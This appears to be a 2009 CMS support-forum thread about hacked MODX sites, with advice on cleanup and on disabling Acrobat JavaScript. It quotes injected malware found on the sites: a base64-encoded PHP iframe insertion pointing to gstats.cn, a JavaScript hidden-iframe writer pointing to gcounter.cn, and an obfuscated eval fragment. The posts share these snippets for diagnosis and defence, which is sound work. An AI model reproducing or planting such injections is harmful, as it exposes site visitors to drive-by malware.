Site Hacked.....

FYI: Had a similar problem here.

On one installation document.parser.class.inc.php was ’patched’.

Malware-Code in manager/includes/document.parser.class.inc.php (line 516f):
       setcookie("prpc", 1, time()+20*10*25*142, "/");
       if (!isset($_COOKIE["prpc"])) $this->documentOutput = str_replace(’</body>’, base64_decode("PGlmcmFtZSBzcmM9aHR0cDovL2dzdGF0cy5jbiBzdHlsZT1kaXNwbGF5Om5vbmU+PC9pZnJhbWU+") . "\n</body>", $this->documentOutput);

On another installation external.js was ’patched’.

Malware-Code in assets/snippets/maxigallery/js/external.js (line 11ff):

if (document.cookie.search("mcdbh=8") == -1) {
document.write("<"+"if"+"rame s"+"rc="+"http://gc"+"ounter.cn "+"style=d"+"is"+"play:none"+">"+"</ifra"+"me"+">");
document.cookie = "mcdbh=8;expires=Sun, 01-Dec-2011 08:00:00 GMT;path=/";}

Seems that the ’patcher’ has some knowledge of MODx.

Just to echo Dan’s previous post, these attacks have nothing to do with MODX CMS nor is it likely that those responsible have any particular knowledge of MODX CMS . The code posted by Jako is typical of code added to any PHP file on hacked servers, even those that are not running a CMS. You will almost always find PHP code obfuscated by base64-encoding the contents, and you will find compromised Javascript code that uses an anonymous function with eval() urldecode replace characters in a string that generates an include to the infected .pdf file on the hacker’s remote site:

(function(jil){var xR5p=’%’;eval(unescape((’var"20a"3d"22Sc"72iptEngin"6 . . .

The article Dan linked to below is very good, but it does not mention the very first thing you should do (well second, after changing your FTP username and password and removed all saved FTP usernames and passwords from your FTP applications) is to open up Adobe Acrobat Reader, go to Edit->Preferences->Javascript and uncheck "Enable Acrobat Javascript". You should certainly update Adobe Acrobat, but if you are already infected, it will likely interfere with the Adobe update process. You will likely need to download a fresh copy of Adobe Acrobat if you are not already using version 9.x the automatic ("Check for Updates") in version 8.x and seems to search for updates to version 8 only. After installing the updated version of Adobe, you will need to go into Preferences again and disable JavaScript a second time.

I will reiterate from before--if this JavaScript option is enabled and you visit an infected website, even with Javascript disabled in your browser, you will become infected, even if you only visit the homepage, click on nothing in the site, and leave. Disabling JavaScript in Adobe Acrobat will prevent infection / reinfection regardless of which version of Adobe Acrobat is installed on your system.

Server-side, a full restore from a backup that predates the infection is your best bet. For even more security, you could certainly specify the IP addresses that are permitted to log in to your web server.

Steven

Thanks for the detailed summary Steven. Much appreciated.

After installing the updated version of Adobe, you will need to go into Preferences again and disable JavaScript a second time.

Hi Steven,

these hacks sound nasty - shudder to think...!
what about the flash-player? i think this exploit affects the flash-player as well, right? i precausiously updated Acrobat and the flash player. here’s Adobes Security Bulletin: http://www.adobe.com/support/security/bulletins/apsb09-06.html

and btw, what is Acrobats js-functionalty used for anyways?

thanks, j

What do you JS for on your website?

You can do most of the same stuff such a form validation in a PDF document. You can also include photos, 3d files, audio, and video in PDF files, but that’s beside the point.

Oh, and Adobe should be doing regular patches going forward to address the issue if anyone missed the announcement.

AMDbuilder

Thanks again for everyones input - Id like to say again - Im sorry if I in any way implied this is a MOD-X specific exploit... it is NOT! - the last thing I want to do is upset the support and use of the  great framework that is ModX

A bulletin update regarding this exploit was released by adobe on June 4 - the same day as my original post, scarily enough: http://www.adobe.com/support/security/bulletins/apsb09-06.html

Steven, from your post, am I right in concluding from what you say that disabling Javascript in Adobe will also disable the exploit? Or, once the exploit is resident, there is a vulnerability until the local machine is cleaned (either by finding the virus or formatting the drive)?

I say this as I have run Sophos, Antivirus, Norton, AVG, Avast, Spybot S&D, Spyware Doctor and Adaware without any success in hunting down the trojan in question.

Separately, am I right in saying that the actual site hosted does not have the trojan/dropper/exploit resident  itself, rather  a script / code redirection (either through iframes or javascript injection - and image / SWF Flash injection in some circumstances) to the trojan and / or marketing scam sites, etc?



Thanks again,

Dan.

Try Trojan Remover and also if you didn’t already disable system restore. Viruses are known to hide in these areas. Also if you have two or more profiles you need to scan in them all.

Best of luck,
AMDbuilder

I say this as I have run Sophos, Antivirus, Norton, AVG, Avast, Spybot S&D, Spyware Doctor and Adaware without any success in hunting down the trojan in question.

i read somewhere people were succesfull with Malwarebytes’ Anti-Malware

Malwarebytes’ Anti-Malware is probably the best tool for detecting this exploit (along with many others)--free to install and scan on-demand, low-cost to add real-time scanning. There is also info on their site on installing Malwarebytes under another application name in case a exploit is blocking applications in your registry by name.

I believe Acrobat’s Javascript functionality is used for form completion and validation. It does make you shudder to think that you can simply visit a site with JavaScript disabled, click on nothing, and still become infected.

The same exploit would could theoretically propagated through Flash using a malicious .swf file; however, I haven’t seen a malicious .swf used to deliver the gumblar.ca exploit yet as programming the buffer overflow that allowed compromised access to your local system is apparently more difficult to program for a .swf than for a .pdf.

Adobe did release a patch, but it came quite late in IMHO... Another issue is Adobe’s updater which checks for updates to your current version only (and I’m not sure whether or not they patched earlier versions). Thus, if you are using Adobe Acrobat 8 and click check for updates from within Adobe Acrobats interface it will inform you there are not updates--not prompt you to update to version 9.xx. Also, if you are already infected, updates to Adobe Acrobat will be blocked in your registry (along with other antivirus updates).

Even after installing the patched 9.xx version, Javascript is still enabled by default, and it should be disabled unless you have a specific need for it.

Steven

thanks for that detailed explanation - again